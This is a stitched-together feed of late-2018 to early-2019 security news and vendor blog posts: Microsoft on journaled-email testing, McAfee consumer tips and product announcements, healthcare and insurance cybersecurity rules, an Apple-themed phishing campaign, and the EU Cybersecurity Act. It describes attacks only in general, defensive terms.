Sometimes we receive inquiries from customers seeking guidance on whether journaled email can be used to measure the effectiveness of our security solution. Sometimes, third-party vendors use journaled emails to assess effectiveness; however, this can lead to inaccurate results because there is a:

  1. Misunderstanding of how the email security protection stack is built in Office 365.
  2. Mischaracterization of a miss versus a catch because of #1.
  3. Misinterpretation of data to customers based on #1 and #2.

In this scenario, third-party vendor(s) recommended customers create a journaling rule routing emails to the vendors testing cluster. The vendor(s) then evaluated the emails with their advanced filters to determine which emails Office 365 ATP missed. However, in Office 365, ATP protectionwhich includes Safe Attachments (file/URL detonation) and Safe Links (time-of-click protection)comes after the journaling rules. As a result, emails routed to a journaling archive have not yet been scanned by ATPs Safe Attachments or Safe Links policies (Figure 2). Our stack is designed so that journaling comes after the standard EOP anti-virus scansbut before ATP scansso known malicious emails are not archived. A potential best practice is to rescan emails released from an archive to help ensure they’re not malicious.

Figure 2. The top graphic shows the entire mail flow and security stack in EOP/ATP, while the bottom graphic is a blowup of the section that shows where the journaling rule takes effect and how it is before our Safe Attachments/URL sandboxing policy, which is part of Office 365 ATP.

Helping ensure our customers’ security

When journaled mail is used to measure effectiveness, its important to remember that the emails are not scanned by ATPsince journaling happens before ATP. Figure 3 shows how measuring journaled emails for effectiveness can cause a misinterpreted analysis because most emails thought to have been missed were in fact blocked by ATP and how a large percentage of emails not detected by ATP were false positives.

Figure 3. The emails which were characterized as misses never went through the ATP filters. When we ran them through ATP, we found ATP blocked most of the emails and also did not block many emails that were false positives.

There have been situations where customers were advised by third parties to use journaled emails to identify emails missed by Office 365 ATP, which is impossible due to the architecture of Office 365s mail flow. As with any service, Office 365 ATP also misses some emails. No service is 100 percent secure, but the best services are able to enhance and evolve quickly to address emerging threats. This ability to quickly enhance our services is one of our strengths and is manifest in the rapid evolution of Office 365 ATP into the optimal security service for Office 365.

Flipping the script

Interestingly, customers often provide us with email samples already scanned by a third-party vendor’s advanced filters to determine how Office ATP would perform on the same set of emails. Figure 4 shows the unique catch of ATP versus a third-party vendor in one such inquiry. In that inquiry, Office 365 ATP found 18 times more unique malicious emails than the third-party vendor. Also, with phishing being a predominate form of attack, we saw that the third-party vendor missed several hundred phishing emails.

Figure 4. Office 365 ATPs unique catch rate is 18 times greater than a third-party vendor, from a recent comparison of data shared with Microsoft by a customer.

How do I know which data to trust?

We dont look for gaps in third-party services unless a customer asks us to investigate. Our focus is on enhancing our service to help provide maximum security for our customers. We dont claim to catch everything; however, we are confident that no other service will secure you better in Office 365 than Office 365 ATP. Put us to the test with a trial. We have previously suggested that bifurcating real mail flow will provide a side-by-side analysis on effectiveness. This is the most powerful and informative test.

Begin an Office 365 E5 trial today to experience best-in-class security for your Office 365 environment and contact your rep to help you test us against any competitor. The results will serve as the ultimate validation that Office 365 ATP provides the best security for your Office 365 environment.

The post Be careful of data without context: The case of malware scanning of journaled emails appeared first on Microsoft Secure.

How to Protect Three Common IoT Devices in 2019

It’s no secret – IoT devices are creeping into every facet of our daily lives. In fact, Gartner estimates there will be 20.4 Billion IoT devices by the year 2020. More devices mean greater connectivity and ease of use for their owners, but connectivity also means more opportunities for hacks. With CES 2019 kicking off this week, we turn our focus toward the year ahead, and take a look at some of the IoT devices that are particularly high-profile targets for cybercriminals: gaming systems, voice tech, routers, and smart cars.

Routers

Routers are very susceptible to attacks as they often come with factory-set passwords that many owners are unaware of or don’t know how to change, making these devices easy targets for hackers. That’s bad news, since a router is the central hub in a connected home. If a router is compromised and all of the devices share the same Wi-Fi network, then they could potentially all be exposed to an attack. How? When an IoT device talks to its connected router, the device could expose many of its internal mechanisms to the internet. If the device does not require re-authentication, hackers can easily scan for devices that have poorly implemented protocols. Then with that information, cybercriminals can exploit manufacturer missteps to execute their attacks. To help protect your router (and thus all your other devices), a best practice is to consider one with a layer of protection built-in, and be sure to use a long and complex password for your Wi-Fi network.

Gaming Systems

Over ten years ago, researchers found that many video gaming consoles were being distributed with major security issues involved with the Universal Plug and Play protocol (UPnP), a feature that allows IoT devices on a network to see each other and interact with one another. However, not much has been done to solve the problem. Through exploiting the UPnP weaknesses in gaming systems to reroute traffic over and over again, cybercriminals have been able to create “multi-purpose proxy botnets,” which they can use for a variety of purposes.  This is just the jumping-off point for malicious behavior by bad actors. With this sort of access into a gaming system, they can execute DDoS attacks, malware distribution, spamming, phishing, account takeovers, click fraud, and credit card theft. Our recent gaming survey found that 64% of respondents either have or know someone who has been directly affected by a cyberattack, which is an astonishing uptick in attacks on gamers. Considering this shift, follow our tips in the section above for routers and Wi-Fi, never use the same password twice, and be weary of what you click on.

Voice Tech

In 2018, 47.3 million adults had access to smart speakers or voice assistants, making them one of the most popular connected devices for the home. Voice-first devices can be vulnerable largely due to what we enable them to be connected with for convenience; delivery, shopping, and transportation services that leverage our credit cards. While it’s important to note that voice-first devices are most often compromised within the home by people who have regular access to your devices (such as kids) when voice recognition is not properly configured, any digital device can be vulnerable to outside attacks too if proper security is not set up. For example, these always-on, always-listening devices could be infiltrated by cybercriminals through a technique called “voice squatting.” By creating “malicious skills,” hackers have been able to trick voice assistants into continuing to listen after a user finishes speaking. In this scenario an unsuspecting person might think they’re connecting to their bank through their voice device, when unbeknownst to them, they’re giving away their personal information.  Because voice-controlled devices are frequently distributed without proper security protocol in place, they are the perfect vehicle in terms of executing a cyberattack on an unsuspecting consumer. To protect your voice assistants, make sure your Wi-Fi password is strong, and be on the lookout for suspicious activity on linked accounts.

While you can’t predict the future of IoT attacks, here are some additional tips and best practices on how to stay ahead of hackers trying to ruin your year:

  • Keep your security software up-to-date. Software and firmware patches are always being released by companies and are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
  • Pay attention to the news. With more and more information coming out around vulnerabilities and flaws, companies are more frequently sending out updates for smart cars and other IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security.
  • Change your device’s factory security settings. This is the single most important step to take to protect all devices. When it comes to products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as opening the box. By changing the factory settings you’re instantly upgrading your device’s security.
  • Use best practices for linked accounts.  For gaming systems and voice-first devices in particular, if you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
  • Setup a separate IoT network. Consider setting up a second network for your IoT devices that don’t share access to your other devices and data. Check your router manufacturer’s website to learn how. You might also consider adding in another network for guests and unsecured devices from others. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.
  • Use a firewall. A firewall is a tool that monitors traffic between an Internet connection and devices to detect unusual or suspicious behavior. Even if a device is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. When looking for a comprehensive security solution, see if a Firewall is included to ensure that your devices are protected.
  • Up your gaming security. Just announced at CES 2019, we’re bringing a sense of security to the virtual world of video games. Get in on the action with McAfee Gamer Security, Beta, it’s free!

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post How to Protect Three Common IoT Devices in 2019 appeared first on McAfee Blogs.

HHS Publishes Voluntary Healthcare Cybersecurity Practices for Medical Organizations

The U.S. Department of Health and Human Services (HHS) released voluntary healthcare cybersecurity practices to help medical organizations strengthen their security posture.

On December 28, HHS released “Health Industry Cybersecurity Practices (HICP): Managing Threats and Protecting Patients” in response to a mandate to develop healthcare cybersecurity standards laid out by the Cybersecurity Act of 2015. More than 150 cybersecurity and healthcare experts from the private and public sectors worked together for two years to fulfill this directive.

The publication is broken down into three sections. The first examines cybersecurity threats confronting the healthcare industry. The second portion identifies weaknesses that render healthcare organizations vulnerable to threats, and the third and final segment outlines strategies that medical entities can use to defend against digital threats.

Healthcare Data Breaches on the Rise

Healthcare data breaches are on the rise. In a study published by the JAMA Network, researchers analyzed all the data security incidents reported to the Office of Civil Rights at HHS between January 2010 and December 2017. They found a total of 2,149 breaches affecting 176.4 million patient records. The annual number of data breaches increased each year during the analyzed time period except 2015, starting with 199 in 2010 and growing to 344 in 2017.

Of the incidents that exposed patients’ personal health information (PHI), 53 percent originated inside the organization. That’s consistent with the Office of the Australian Information Commissioner’s (OAIC) quarterly statistics for Q3 2018. OAIC received 45 data breach notifications from healthcare organizations during the quarter, 56 percent of which resulted from human error.

Healthcare Cybersecurity Best Practices

Security professionals can begin enforcing healthcare cybersecurity best practices by producing creative employee awareness content that specifically appeals to the company’s workforce. Healthcare organizations should also adopt a security immune system strategy that, among other things, uses artificial intelligence (AI) and automation to mitigate risk across the network.

The post HHS Publishes Voluntary Healthcare Cybersecurity Practices for Medical Organizations appeared first on Security Intelligence.

Kicking off CES 2019 with New Security Solutions and Collaborations

Today, we at McAfee are announcing some exciting new security solutions and integrations at CES in Las Vegas. For those of you who are unfamiliar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies. McAfee now delivers protection to more than 500 million customers worldwide, and we understand the importance of creating new solutions for those who want to live their connected lives with confidence. To help empower our customers to do this, we’ve added to our security lineup and are working with other tech innovators who understand the importance of protecting users’ online safety.

One addition to our lineup of security solutions is McAfee Gamer Security. In a recent gaming survey, we discovered that 75% of gamers are worried about the security of gaming as online threats continue to rise. To help combat these threats, we developed McAfee Gamer Security, which protects gamers while optimizing their gaming experience. Some of the product’s key features include Game Mode, a gamer-centric interface, and minimal security resource consumption. These features help optimize gamers’ computing resources, provide system status updates, and equip users with lightweight security protection.

In addition to our latest product advancements, we’ve also teamed up with other companies looking to better the cybersecurity landscape for consumers. The first is Google. In order to further simplify the process of securing today’s connected home, McAfee will provide McAfee Secure Home Platform voice commands for the Google Assistant. McAfee Secure Home Platform provides an extra layer of security to help automatically protect all of the connected devices on the user’s home network. Soon, Google Assistant users can easily manage their connected home security by just using their voice.

While it’s important to secure the connected home, it is also important to protect your mobile and IoT devices as well. According to McAfee Labs 2019 predictions, cybercriminals will leverage trusted devices like smartphones and tablets to try and access users’ IoT devices in the upcoming year. To help customers stay safeguarded from this threat, we’ve teamed up with Verizon to protect their home networks through Verizon Home Network Protection. This McAfee-powered solution helps Verizon Fios customers stay secured against malicious websites, provide parental controls, and protect all devices connected to their home network.

Furthermore, we at McAfee and Dell have teamed up to protect consumers and small businesses as they enjoy the benefits of today’s technology. To do this, we’ve expanded our collaboration to provide pre-installed McAfee software on PCs and laptops globally to both consumer and small business customers. Customers who purchase a new laptop or PC will also have the option to extend McAfee protection beyond their Dell device to their smartphones and tablets. This allows users to have a more robust security shield around all of their connected devices, creating a safer overall online experience. Dell consumer and small business customers who purchase Dell Inspiron, XPS, Vostro, and G-Series laptops will receive a 30-day or 1-year subscription. Customers who purchase Alienware, OptiPlex, Latitude, and Precision will have the option of adding a 30-day free subscription or purchasing a 1-year subscription.

Another one of our latest innovations is the addition of Cryptojacking Blocker to McAfee WebAdvisor. As we observed in our latest McAfee Labs report, coin mining malware is on the rise, growing more than  4000% in the last year. Cryptojacking Blocker helps protect users from having their devices hijacked without their knowledge or permission. The tool helps prevents websites from mining for cryptocurrency and is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

So far, CES 2019 has proven that innovation will continue to evolve, just as the cybersecurity landscape will continue to mature. By working together to improve the technology that protects connected devices, we can help users optimize their digital life without compromising their online safety.

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking off CES 2019 with New Security Solutions and Collaborations appeared first on McAfee Blogs.

Cybersecurity Rules for Insurance Companies to Take Effect in South Carolina

New cybersecurity rules for insurance companies licensed in South Carolina are set to take effect in part on January 1, 2019. The new law is the first in the United States to be enacted based on the data security model law drafted by the National Association of Insurance Commissioners. The law requires licensed insurance companies to notify state insurance authorities of data breaches within 72 hours of confirming that nonpublic information in the company’s (or a service provider’s) system was “disrupted, misused, or accessed without authorization.” The breach reporting requirement is in addition to notification obligations imposed under South Carolina’s breach notification law and applies if the insurance company has a permanent location in the state or if the breach affects at least 250 South Carolina residents, among other criteria. The 72-hour notice requirement takes effect January 1, 2019.

Separately, effective July 1, 2019, the law requires insurance companies licensed in South Carolina to develop and implement a comprehensive, written cybersecurity program. Among other details, the program must be based on a company’s own risk assessments and must include encryption of information in transit, regular testing of systems, and cybersecurity awareness training for employees. The law will also require insurance companies to “exercise due diligence” in choosing third-party service providers and to ensure that service providers have appropriate information safeguards in place no later than July 1, 2020.

Level Up Your Cybersecurity: Insights from Our Gaming Survey

Online gaming has seen a rise in popularity over the years. Many people see it as a way to unwind from a stressful day or complete new challenges. However, just like any other internet-connected channel, online gaming can expose users to a variety of cybersecurity risks. So, to examine the relationship between cybersecurity and gaming, we decided to survey 1,000 U.S. residents ages 18 and over who are frequent gamers. *

Time to Upgrade Your Online Safety

Of those surveyed, 75% of PC gamers chose security as the element that most concerned them about the future of gaming. This makes sense since 64% of our respondents either have or know someone who has been directly affected by a cyberattack. And while 83% of the gamers do use an antivirus software to protect their PCs, we found that gamers still participate in risky online behavior.

Poor Habits Could Mean Game Over for Your Cybersecurity

So, what does this risky behavior look like, exactly? The following sums it up pretty well:

  • 55% of gamers reuse passwords for multiple online accounts, leading to greater risk if their password is cracked.
  • 36% of respondents rely on incognito mode or private browsing to keep their PC safe.
  • 41% read the privacy policies associated with games, though this technique won’t help to keep their device secure.

With these lax habits in place, it’s not hard to believe that 38% of our respondents experienced at least one malicious attack on their PC. And while 92% installed an antivirus software after experiencing a cyberattack, it’s important for gamers to take action against potential threats before they occur.

Level Up Your Gaming Security

Now the question is – what do these gamers need to do to stay safe while they play? Start by following these tips:

  • Do not reuse passwords. Reusing passwords makes it easier for hackers to access more than one of your accounts if they crack one of your logins. Prevent this by using unique login credentials for all of your accounts.
  • Click with caution. Avoid interacting with messages from players you don’t know and don’t click on suspicious links. Cybercriminals can use phishing emails to send gamers malicious files and links that can infect their device with malware.
  • Use a security solution. Using a security service to safeguard your devices can help protect you from a variety of threats that can disrupt your gaming experience. Look out for our newest product McAfee Gamer Security, which we launched just in time for CES 2019. Although this product is still in beta mode, it could be used to combat cyberthreats while optimizing your computing resources.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

*Survey respondents played video games at least four times a month and spent at least $200 annually on gaming.

The post Level Up Your Cybersecurity: Insights from Our Gaming Survey appeared first on McAfee Blogs.

Hackers defeat vein authentication by making a fake hand

Biometric security has moved beyond just fingerprints and face recognition to vein-based authentication. Unfortunately, hackers have already figured out a way to crack that, too. According to Motherboard, security researchers at the Chaos Communication Congress hacking conference in Leipzig, Germany showed a model wax hand that they used to defeat a vein authentication system using a wax model hand.

Source: Motherboard

Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is actually a stealthy phishing email, which has been circulating the internet, prompting users to click on a link if the transaction was unauthorized.

So how exactly does this phishing campaign work? In this case, the cybercriminals rely on the victim to be thrown off by the email stating that they purchased an app when they know that they didn’t. When the user clicks on the link in the receipt stating that the transaction was unauthorized, they are redirected to a page that looks almost identical to Apple’s legitimate Apple Account management portal. The user is prompted to enter their login credentials, only to receive a message claiming that their account has been locked for security reasons. If the user attempts to unlock their account, they are directed to a page prompting them to fill out personal details including their name, date of birth, and social security number for “account verification.”

Once the victim enters their personal and financial information, they are directed to a temporary page stating that they have been logged out to restore access to their account. The user is then directed to the legitimate Apple ID account management site, stating “this session was timed out for your security,” which only helps this attack seem extra convincing. The victim is led to believe that this process was completely normal, while the cybercriminals now have enough information to perform complete identity theft.

Although this attack does have some sneaky behaviors, there are a number of steps users can take to protect themselves from phishing scams like this one:

  • Be wary of suspicious emails. If you receive an email from an unknown source or notice that the “from” address itself seems peculiar, avoid interacting with the message altogether.
  • Go directly to the source. Be skeptical of emails claiming to be from companies asking to confirm a purchase that you don’t recognize. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Use a comprehensive security solution. It can be difficult to determine if a website, link, or file is risky or contains malicious content. Add an extra layer of security with a product like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

Agreement on Proposal for Cybersecurity Act

The European Commission (“Commission”), the European Parliament (“Parliament”) and the Council of the European Union reached an agreement earlier this month regarding changes to the Proposal for a Regulation on ENISA, the “EU Cybersecurity Agency”, and repealing Regulation (EU) 526/2013, and on Information and Communication Technology Cybersecurity Certification (the “Cybersecurity Act”). The agreement empowers the EU Cybersecurity Agency (known as European Union Agency for Network and Information and Security, or “ENISA”) and introduce an EU-wide cybersecurity certification for services and devices.

Background

The Cybersecurity Act was introduced in a wide-ranging set of cybersecurity measures adopted by the Commission on September 13, 2017, and proposed as a priority of the Digital Single Market Strategy. The objective of these measures was to deal with cyber-attacks and build strong cybersecurity in the EU.

More Powers for ENISA

The Cybersecurity Act reinforces the ENISA’s centrality to better support Member States when facing cybersecurity threats or attacks. The Cybersecurity Act grants more powers to and new tasks for ENISA, including:

  • A permanent mandate. The initial temporary mandate was due to end in 2020 and is now replaced by a permanent mandate. More resources will also be allocated to ENISA to accomplish its tasks.
  • To prepare the EU for a crisis response to major cyberattacks.
  • To assist Member States in responding effectively to cyber-attacks with a greater cooperation and coordination at the EU level.

ENISA will also be recognized as an independent center of expertise that will promote awareness to citizens and businesses and that will assist the EU institutions and Member States in the development and implementation of policies.

Cybersecurity Certification Framework</